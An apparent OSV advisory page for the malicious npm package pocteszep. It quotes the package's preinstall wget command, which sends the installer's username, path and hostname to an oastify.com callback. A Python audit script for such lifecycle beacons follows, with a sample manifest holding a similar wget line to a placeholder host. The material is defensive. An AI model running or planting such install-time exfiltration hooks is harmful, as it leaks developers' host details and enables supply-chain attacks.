npm

pocteszep@1.1.1

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5544

Ecosystem

npm

Summary

The package's npm preinstall lifecycle script runs wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)" (package.json line 8). On npm install, before any code review can take place, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain, a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any installer that pulls this package through a name collision with an internal dependency leaks host identity to the attacker.

Source: amazon-inspector (e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d)
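The beacon pattern described above (an install-time lifecycle hook that shells out to wget or curl, interpolates whoami/hostname/pwd via command substitution, and posts the result over plaintext HTTP) can be caught before npm runs it by auditing package.json. The following is an added example written for this page, not code from OSV or amazon-inspector; the manifest and the callback.example host are constructed samples, and the heuristics are assumptions about what a beacon looks like, not a complete malware detector.

```python
import json
import re

# Hooks npm executes automatically during `npm install`, before any code is reviewed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics (assumed): a network client, shell command substitution that
# captures host identity, and a plaintext-HTTP destination.
NETWORK_CLIENT = re.compile(r"\b(wget|curl)\b")
SUBSTITUTION = re.compile(r"\$\([^)]*\)|`[^`]*`")
IDENTITY_CMDS = re.compile(r"\b(whoami|hostname|pwd|id)\b")
URL = re.compile(r"https?://([^/\s\"']+)")


def audit_lifecycle_scripts(manifest_text: str) -> list[dict]:
    """Return one finding per lifecycle script that looks like an install-time beacon."""
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = []
        if NETWORK_CLIENT.search(cmd):
            reasons.append("network client")
        if SUBSTITUTION.search(cmd) and IDENTITY_CMDS.search(cmd):
            reasons.append("host identity via command substitution")
        m = URL.search(cmd)
        if m and m.group(0).startswith("http://"):
            reasons.append(f"plaintext HTTP to {m.group(1)}")
        if reasons:
            findings.append({"hook": hook, "command": cmd, "reasons": reasons})
    return findings


# Constructed sample manifest; the domain is a placeholder, not the real callback host.
SAMPLE_MANIFEST = """{
  "name": "internal-utils",
  "version": "1.1.1",
  "description": "constructed sample for the audit function above",
  "scripts": {
    "preinstall": "wget --quiet \\"http://callback.example/?user=$(whoami)&host=$(hostname)\\"",
    "test": "node test.js"
  }
}"""

if __name__ == "__main__":
    for finding in audit_lifecycle_scripts(SAMPLE_MANIFEST):
        print(f"[{finding['hook']}] {', '.join(finding['reasons'])}: {finding['command']}")
```

Running the audit over a package's manifest before `npm install`, or installing with `npm ci --ignore-scripts` so lifecycle hooks never execute, keeps the beacon from firing even when a name collision pulls in the wrong package.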
